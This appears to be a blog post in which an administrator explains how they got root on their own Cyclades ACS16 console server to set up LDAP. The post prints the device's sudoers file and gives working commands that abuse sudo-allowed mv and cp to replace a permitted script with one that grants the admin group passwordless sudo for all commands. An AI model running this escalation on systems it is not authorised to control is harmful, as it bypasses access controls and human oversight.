At work we have a Cyclades ACS16 console server (running Cyclades-ACS16-Linux V_3.2.0 (Jan/04/08)). While the docs claim all sorts of LDAP features, there’s nothing (either in the web GUI or the CLI configuration tool) to setup LDAP with TLS or required group membership. I tried modifying the /etc/ldap.conf and /etc/nsswitch.conf files, running saveconf and runconf and even rebooting, but no luck. It was apparent that I needed root on the box. Unfortunately, they don’t give you root, and their sudo command is locked down. But, I figured, if sudo would let me and chown and cat and mv (enough to switch out the ldap.conf and nsswitch.conf files), root should be pretty easy.

The failing of Cyclades’ sudo lockdown is that it allows sudo execution of a few random shell scripts, and also allows `mv`.

The /etc/sudoers:

# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the sudoers man page for the details on how to write a sudoers file.
#

# User alias specification

# Runas alias specification

# Host alias specification

# Cmnd alias specification
Cmnd_Alias     SH_CMDS = /bin/cp,  
                        /bin/chown,  
                        /bin/egrep,  
                        /bin/grep,  
                        /bin/cat,  
                        /bin/tar,  
                        /bin/kill,  
                        /bin/mkdir,  
                        /bin/mv,  
                        /bin/rm,  
                        /bin/sed,  
                        /bin/touch,  
                        /sbin/reboot,  
                        /usr/bin/killall,  
                        /usr/bin/w,  
                        /bin/w_cas,  
                        /bin/sess_mngt,  
                        /sbin/route,  
                        /bin/what

Cmnd_Alias     CONF_FILES = /bin/vi /etc/network/st_routes,  
                           /bin/vi /etc/portslave/pslave.conf,  
                           /bin/vi /etc/resolv.conf

Cmnd_Alias     APPLICATIONS = /bin/pmCommand,  
                             /bin/saveconf,  
                             /bin/restoreconf,  
                             /bin/runconf,  
                             /bin/daemon.sh,  
                             /bin/manageService.sh,  
                             /bin/dsviewKillAdmin,   
                             /bin/pmfwupgrade,   
                             /bin/adsap2_clear,   
                             /bin/upgrade_power.sh,   
                             /bin/signal_ras

# User privilege specification
# root can run any command on any host as any user.
root    ALL = (ALL) ALL

# admin user group command specification.
%admin      ALL = NOPASSWD: SH_CMDS, CONF_FILES, APPLICATIONS

So, /bin/upgrade_power.sh doesn’t look like we’re using it too much. Here’s our root procedure. Before doing this, create the /home/admin/foo.sh script.

sudo cp /bin/upgrade_power.sh /bin/upgrade_power.sh.SAVE
sudo chown root:root /home/admin/foo.sh
sudo mv /home/admin/foo.sh /bin/upgrade_power.sh
sudo /bin/upgrade_power.sh
sudo cat /etc/sudoers # just to verify that it worked
sudo mv /bin/upgrade_power.sh.SAVE /bin/upgrade_power.sh # set things back to the way they were

And the key to all of it is the simple /home/admin/foo.sh script:

#!/bin/bash

chmod u+w /etc/sudoers
echo "%admin      ALL = NOPASSWD: ALL" >> /etc/sudoers
chmod u-w /etc/sudoers

That’s it!



Comments

comments powered by Disqus